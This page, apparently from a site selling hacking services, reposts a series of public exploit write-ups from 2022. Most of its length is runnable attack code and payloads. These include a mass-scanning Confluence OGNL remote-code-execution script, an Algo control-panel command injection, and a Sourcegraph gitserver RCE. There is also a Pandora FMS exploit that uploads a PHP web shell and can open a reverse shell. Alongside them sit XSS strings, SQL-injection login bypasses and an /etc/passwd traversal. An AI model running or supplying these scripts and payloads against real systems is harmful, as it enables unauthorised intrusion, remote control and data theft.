Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863128777

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
# Date: 2022-06-05
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://motopress.com/
# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
# Version: 4.2.4
# Tested on: Windows/XAMPP
###########################################################################
PoC:

1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type
2. Click on "Add Accommodation Type".
3. Add title payload= "><script>alert("XSS")</script>
4. Excerpt input payload "><script>alert("XSS")</script>
5. Click publish.
6. Visit http://localhost/accommodations/
7. XSS payload execute.
HireHackking 
# Exploit Title: SolarView Compact 6.00 - Directory Traversal
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29298

# Tested on: Windows

# Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg
HireHackking 
# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 06/006/2022
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: All < 7.4.17 versions before 7.18.1
# Tested on: -
# CVE : CVE-2022-26134
# https://github.com/h3v0x/CVE-2022-26134

#!/usr/bin/python3

import sys
import requests
import optparse
import multiprocessing

from requests.packages import urllib3
from requests.exceptions import MissingSchema, InvalidURL
urllib3.disable_warnings()

requestEngine = multiprocessing.Manager()
session = requests.Session()

global paramResults
paramResults = requestEngine.list()
globals().update(locals())

def spiderXpl(url):
    globals().update(locals())
    if not url.startswith('http'):
        url='http://'+url
    
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
               "Connection": "close",
               "Accept-Encoding": "gzip, deflate"}

    try:
        response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)
        if(response.status_code == 302):
            print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])

            inputBuffer = str(response.headers['X-Cmd-Response'])
            paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')
        else:
            pass

    except requests.exceptions.ConnectionError:
        print('[x] Failed to Connect: '+url)
        pass
    except multiprocessing.log_to_stderr:
        pass
    except KeyboardInterrupt:
        print('[!] Stoping exploit...')
        exit(0)
    except (MissingSchema, InvalidURL):
        pass
    
    
def banner():
    print('[-] CVE-2022-26134')
    print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')

    
def main():
    banner()
    
    globals().update(locals())
    
    sys.setrecursionlimit(100000)

    if not optionsOpt.filehosts:
        url = optionsOpt.url
        spiderXpl(url)
    else:
        f = open(optionsOpt.filehosts)
        urls = map(str.strip, f.readlines())

        multiReq = multiprocessing.Pool(optionsOpt.threads_set)
        try:
            multiReq.map(spiderXpl, urls)
            multiReq.close()
            multiReq.join()
        except UnboundLocalError:
            pass
        except KeyboardInterrupt:
            exit(0)


    if optionsOpt.output:
        print("\n[!] Saving the output result in: %s" % optionsOpt.output)

        with open(optionsOpt.output, "w") as f:
            for result in paramResults:
                f.write("%s\n" % result)
        f.close()

if __name__ == "__main__":
    parser = optparse.OptionParser()

    parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')
    parser.add_option('-f', '--file', dest="filehosts", help='example.txt')
    parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)
    parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)
    parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')
    parser.add_option('-c', '--cmd', dest="command", type=str, default='id')
    optionsOpt, args = parser.parse_args()

    main()
HireHackking 
# Exploit Title: Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)
# Google Dork: n/a
# Date: May 31, 2022
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://real.com/
# Software Link: http://real.com/
# Version: ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309
# Tested on: Windows 7, 8.1, 10
# CVE : N/A

PoC: https://github.com/Edubr2020/RP_Import_RCE/raw/main/RP_Import_RCE.zip
vídeo: https://youtu.be/CONlijEgDLc

Real Player uses Microsoft Internet Explorer functionality and exposes properties and methods through a special mean which is application specific:

The 'external' object and it exposes several custom methods and properties.

The 'Import()' method is handled in unsafe way regarding the 'Copy to My Music' parameter, which allows for arbitrary file types downloading
which could be unsafe as only audio/image/video types should be allowed to download to the user´s disk. Additionally it does not properly sanitize file paths
allowing planting of arbitrary files on arbitrary locations. Even though it displays an error because it cannot render the downloaded file, the file remains until the user
closes the dialog box. Additionally when opening new windows, Real Player looks for an old, obsolete IE library (shdoclc.dll), which can also be abused to run code automatically without needing to wait
until reboot (true when file is planted in 'startup' folder).

The attacker needs to host the files to be copied/downloaded in an SMB or WebDav share.
The directory 'appdata' must be placed in the share's root.

The PoC will drop 'shdoclc.dll' (has simple code to run 'cmd.exe' at 'DllMain()' for demonstration purposes)  to the user´s 'windowsapps' folder and 'write.exe' to 'startup' folder, so it works universally (any Windows version from at least XP up to 11)

tested on RP ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309
HireHackking
# Exploit Title: Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE) # Google Dork: n/a # Date: May 31, 2022 # Exploit Author: Eduardo Braun Prado # Vendor Homepage: http://real.com/ # Software Link: http://real.com/ # Version: v.20.0.8.310 # Tested on: Windows 7, 8.1, 10 # CVE : N/A Full PoC: https://github.com/Edubr2020/RealPlayer_G2_RCE Real Player G2 Control component contains a remote code execution vulnerability because it allows 'javascript:' URIs to be passed as the argument, which is usually not safe because in some scenarios could allow injection of script code in arbitrary domains (Universal Cross Site Scripting - uXSS) which can potentially be used to eg. steal cookies among other things. By setting the 'URL' parameter to 'javascript:' URI and the 'target' parameter to an 'iframe' html element, it´s possible to cause javascript code to run in the context of a local error page displayed after using the very same Control to navigate to an invalid URI such as 'mhtml:http://%SERVER%/frame.htm': when an 'mhtml:' URI is invoked by MS IE rendering engine, it expects an MHTML file with an extension whose MIME type is set to "message/rfc822", which is the case for '.mht' files; '.htm' files have its MIME set to 'text/html' and thus IE will cancel loading the document and display a local error page (navigation cancelled). The local error page address is 'res://ieframe.dll/navcancl.htm' which belongs to the 'My computer' security zone of IE / Windows which allows reading of arbitrary local files and also arbitrary code execution by design. Prohibiting the 'javascript:' URI in the control mitigates the issue. The PoC uses the 'SYSMON' ActiveX control to plant an HTA file to the user´s startup folder, which will be executed on next logon or boot. an HTA file can contain code to eg. download or extract an embedded EXE file and run it. The PoC assumes Real Player has its current working directory set to a subdirectory of the user´s home directory. Upon downloading files using eg. web browsers, they will be downloaded to the user´s 'Downloads' folder by default, so we don´t need to retrieve the Windows user name to be able to plant the HTA file in the startup folder. This is just for convenience purposes as it´s possible to retrieve this info through a variety of ways, including the MS Web Browser ActiveX. Vulnerability can be exploited by opening a Real Player playlist file such as RAM files. To reproduce the issue, do the following: a) Setup a web server b) on the web server root directory, extract the "RP_G2" folder to it. c) open the just extracted "RP_G2" folder and then open the following files in a text editor: "poc.htm", "sm_rpx.js", "start.ram". Just replace every occurance of the string %SERVER% with the actual web server´s IP address (on each of the files) d) make sure the web server is accessible and all involved files too. on MS IIS web server you may need to add a new extension and associate it with a MIME type, so do it to associate the .RAM extension with the MIME "audio/x-pn-realaudio". e) on the client side (victim), open the web browser and download the "start.ram" file (or can be accessed eg. using a URL protocol such as 'rtsp:') and open it. You should see an HTA file being planted in the user´s startup folder after a few seconds. Note: to open startup folder do this: open the "Run" menu and then type: shell:Startup
HireHackking

Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS) # Date: 2022-06-01 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.avantune.com # Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com # Version: 10 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39) # CVE: CVE-2022-29296 Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject and execute arbitrary web scripts or HTML via a crafted payload. Request parameters affected is "msg". PoC Request: GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1 Host: [REDACTED] Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Connection: close Cache-Control: max-age=0 PoC Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Wed, 11 May 2022 10:51:10 GMT Connection: close Content-Length: 8162 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><link rel="stylesheet" ...[SNIP]... <script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script> ...[SNIP]...
HireHackking
# Exploit Title: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated) # Google Dork: intitle:"Algo 8028 Control Panel" # Shodan: title:"Algo 8028 Control Panel" # Date: 2022-06-07 # Exploit Author: Filip Carlsson # Vendor Homepage: https://www.algosolutions.com/ # Software Link: https://www.algosolutions.com/firmware-downloads/8028-firmware-selection/ # Version: 3.3.3 # Tested on: Version 3.3.3 # CVE : N/A # Exploit: # Due to bad sanitation in http://<IP:PORT>/control/fm-data.lua you can do command injection as root # Request: POST # Formdata: # action: rename # source: /a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;" # target: / #!/usr/bin/env python3 import sys import requests cookie=None def main(): # check if provided 3 args if len(sys.argv) != 4: print_help() return else: host = sys.argv[1] password = sys.argv[2] command = sys.argv[3] if login(host, password): # if login was successful, send command send_command(host, command) def print_help(): print("Usage: algo.py 192.168.1.123 password command") print("Example: algo.py 192.168.123 algo \"cat /etc/passwd\"") def login(host, password): url = f"http://{host}/index.lua" data = {"pwd": password} res = requests.post(url, data=data) # check if html contains "Invalid Password" if "Invalid Password" in res.text: print("Invalid password") return False else: # save cookie global cookie cookie = res.cookies print("Successfully logged in\n") return True def send_command(host, command): url = f"http://{host}/control/fm-data.lua" data = {"action": "rename", "source": f"/a\";echo $({command}) 2>&1 > /opt/algo/web/root/a.txt;\"", "target": "/"} res = requests.post(url, data=data, cookies=cookie) # get http://host/cmd.txt url = f"http://{host}/a.txt" res = requests.get(url) # if "404 Not Found" in text then command was not executed if "404 Not Found" in res.text: print("Command was not executed (404)") else: print(res.text) # delete cmd.txt url = f"http://{host}/control/fm-data.lua" data = {"action": "rename", "source": f"/a\";$(rm -rf /opt/algo/web/root/a.txt);\"", "target": "/"} requests.post(url, data=data, cookies=cookie) if __name__ == "__main__": main()
HireHackking

Virtua Software Cobranca 12S - SQLi

HACKER · %s · %s

# Exploit Title: Virtua Software Cobranca 12S - SQLi # Shodan Query: http.favicon.hash:876876147 # Date: 13/08/2021 # Exploit Author: Luca Regne # Vendor Homepage: https://www.virtuasoftware.com.br/ # Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe # Version: 12S # Tested on: Windows Server 2019 # CVE : CVE-2021-37589 ------------------------------------------------------------------------ ## Description A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter. ## Request PoC ``` POST /controller/login.php?acao=autenticar HTTP/1.1 Host: redacted.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 37 Connection: close Cookie: origem_selecionado=; PHPSESSID= idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario ``` This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error. ``` POST /controller/login.php?acao=autenticar HTTP/1.1 Host: redacted.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 37 Connection: close Cookie: origem_selecionado=; PHPSESSID= idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario ``` ## Exploit Save the request from burp to file ```bash python3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent ```
HireHackking
# Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated) # Date: 05/20/2022 # Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) # Vendor Homepage: https://pandorafms.com/ # Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz # Version: v7.0NG.742 # Tested on: Pandora FMS v7.0NG.742 (Ubuntu) # CVE: CVE-2020-5844 # Source: https://github.com/UNICORDev/exploit-CVE-2020-5844 # Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020. #!/usr/bin/env python3 # Imports try: import requests except: print(f"ERRORED: RUN: pip install requests") exit() import sys import time import urllib.parse # Class for colors class color: red = '\033[91m' gold = '\033[93m' blue = '\033[36m' green = '\033[92m' no = '\033[0m' # Print UNICORD ASCII Art def UNICORD_ASCII(): print(rf""" {color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no} {color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no} {color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no} {color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no} """) # Print exploit help menu def help(): print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution Usage: python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password> python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>] python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>] python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>] python3 exploit-CVE-2020-5844.py -h Options: -t Target host and port. Provide target IP address and port. -u Target username and password. Provide username and password to log in to Pandora FMS. -p Target valid PHP session ID. No username or password needed. (Optional) -s Reverse shell mode. Provide local IP address and port. (Optional) -c Custom command mode. Provide command to execute. (Optional) -w Web shell custom mode. Provide custom PHP file name. (Optional) -h Show this help menu. """) exit() # Pretty loading wheel def loading(spins): def spinning_cursor(): while True: for cursor in '|/-\\': yield cursor spinner = spinning_cursor() for _ in range(spins): sys.stdout.write(next(spinner)) sys.stdout.flush() time.sleep(0.1) sys.stdout.write('\b') # Run the exploit def exploit(exploitMode, targetSess): UNICORD_ASCII() # Print initial variables print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}") print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}") if targetSess is not None: print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}") elif targetUser is not None: print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}") print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}") if exploitMode == "command": print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}") if exploitMode == "web": print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}") if exploitMode == "shell": print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}") print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}") print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}") loading(15) # If a PHPSESSID is not provided, grab one with valid username and password if targetSess is None: try: getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"}) targetSess = getSession.cookies.get('PHPSESSID') print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}") if "login_move" in getSession.text: print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}") except: print(f"{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}") exit() # Set headers, parameters, and cookies for post request headers = { 'Host': f'{targetIP}', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874', 'Content-Length': '1289', 'Connection': 'close', 'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager', 'Upgrade-Insecure-Requests': '1', 'Sec-Fetch-Dest': 'document', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-User': '?1' } params = ( ('sec', 'gsetup'), ('sec2', 'godmode/setup/file_manager') ) cookies = {'PHPSESSID': targetSess} # Basic PHP web shell with 'cmd' parameter data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET[\'cmd\']);?>\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n' # Try to upload the PHP web shell to the server try: response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False) except: print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}") exit() statusCode=response.status_code if statusCode == 200: print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}") else: print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}") exit() loading(15) print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}") loading(15) # Print web shell location if in web shell mode if exploitMode == "web": print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}") print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n") # Run custom command on web shell if in command mode if exploitMode == "command": response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}') print(f"{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\n") print(response.text) # Run reverse shell command if in reverse shell mode if exploitMode == "shell": shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'" try: requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1) print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n") except: print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n") exit() if __name__ == "__main__": args = ['-h','-t','-u','-p','-s','-c','-w'] modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'} # Initialize starting variables targetIP = None targetPort = None targetUser = None targetPass = None targetSess = None command = None localIP = None localPort = None webName = "unicord.php" # Default web shell file name exploitMode = "web" # Default to web shell mode # Print help if specified or if a target or authentication is not provided if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv): help() # Collect target IP and port from CLI if args[1] in sys.argv: try: if "-" in sys.argv[sys.argv.index(args[1]) + 1]: raise targetIP = sys.argv[sys.argv.index(args[1]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}") exit() try: if "-" in sys.argv[sys.argv.index(args[1]) + 2]: raise targetPort = sys.argv[sys.argv.index(args[1]) + 2] except: print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}") exit() # Collect target username and password from CLI if args[2] in sys.argv: try: if "-" in sys.argv[sys.argv.index(args[2]) + 1]: raise targetUser = sys.argv[sys.argv.index(args[2]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}") exit() try: if "-" in sys.argv[sys.argv.index(args[2]) + 2]: raise targetPass = sys.argv[sys.argv.index(args[2]) + 2] except: print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}") exit() # Collect PHPSESSID from CLI, if specified if args[3] in sys.argv: try: if "-" in sys.argv[sys.argv.index(args[3]) + 1]: raise targetSess = sys.argv[sys.argv.index(args[3]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p <PHPSESSID>\"{color.no}") exit() # Set reverse shell mode from CLI, if specified if args[4] in sys.argv: exploitMode = "shell" try: if "-" in sys.argv[sys.argv.index(args[4]) + 1]: raise localIP = sys.argv[sys.argv.index(args[4]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}") exit() try: if "-" in sys.argv[sys.argv.index(args[4]) + 2]: raise localPort = sys.argv[sys.argv.index(args[4]) + 2] except: print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}") exit() exploit(exploitMode,targetSess) # Set custom command mode from CLI, if specified elif args[5] in sys.argv: exploitMode = "command" try: if sys.argv[sys.argv.index(args[5]) + 1] in args: raise command = sys.argv[sys.argv.index(args[5]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}") exit() exploit(exploitMode,targetSess) # Set web shell mode from CLI, if specified elif args[6] in sys.argv: exploitMode = "web" try: if sys.argv[sys.argv.index(args[6]) + 1] in args: raise if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]: webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php" else: webName = sys.argv[sys.argv.index(args[6]) + 1] except: print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c <name.php>\"{color.no}") exit() exploit(exploitMode,targetSess) # Run with default web shell mode if no mode is specified else: exploit(exploitMode,targetSess)
HireHackking

Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE) # Date: 2022-06-10 # Exploit Author: Altelus # Vendor Homepage: https://about.sourcegraph.com/ # Version: 3.63.3 # Tested on: Linux # CVE : CVE-2022-23642 # Docker Container: sourcegraph/server:3.36.3 # Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. # This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed # on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible # if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3 # # Exploitation parameters: # - Exposed Sourcegraph gitserver # - Existing repo on sourcegraph import json import argparse import requests def exploit(host, existing_git, cmd): # setting sshCommand data = { "Repo" : existing_git, "Args" : [ "config", "core.sshCommand", cmd ] } res = requests.get(host+"/exec", json=data).text if len(res) > 0: print("[-] Didn't work: {}".format(res)) exit(0) # setting fake origin data = { "Repo" : existing_git, "Args" : [ "remote", "add", "origin", "git@lolololz:foo/bar.git" ] } res = requests.get(host+"/exec", json=data).text if len(res) > 0: print("[-] Didn't work: {}".format(res)) exit(0) # triggering command using push data = { "Repo" : existing_git, "Args" : [ "push", "origin", "master" ] } res = requests.get(host+"/exec", json=data).text print("[*] Finished executing exploit") parser = argparse.ArgumentParser() parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host") parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph") parser.add_argument('--cmd', required=True, help="Command to run") args = parser.parse_args() host = args.gitserver_host existing_git = args.existing_git cmd = args.cmd exploit(host, existing_git, cmd)
HireHackking

SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS) # Date: 2022-05-15 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: ver.6.00 # Vendor home page : https://www.contec.com/ # Authentication Required: No # CVE : CVE-2022-29301 # Tested on: Windows # Proof Of Concept: http://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green
HireHackking

Old Age Home Management System 1.0 - SQLi Authentication Bypass

HACKER · %s · %s

# Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass # Date: 12/06/2022 # Exploit Author: twseptian # Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip # Version: v1.0 # Tested on: Kali Linux # Vulnerable code line 9 in file "/oahms/admin/login.php" $ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'"); # Steps of reproduce: 1. Go to the admin login page http://localhost/oahms/admin/login.php 2. sqli payload: admin' or '1'='1';-- - 3. password: password # Proof of Concept POST /oahms/admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://localhost Connection: close Referer: http://localhost/oahms/admin/login.php Cookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqp Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=
HireHackking

WordPress Plugin Weblizar 8.9 - Backdoor

HACKER · %s · %s

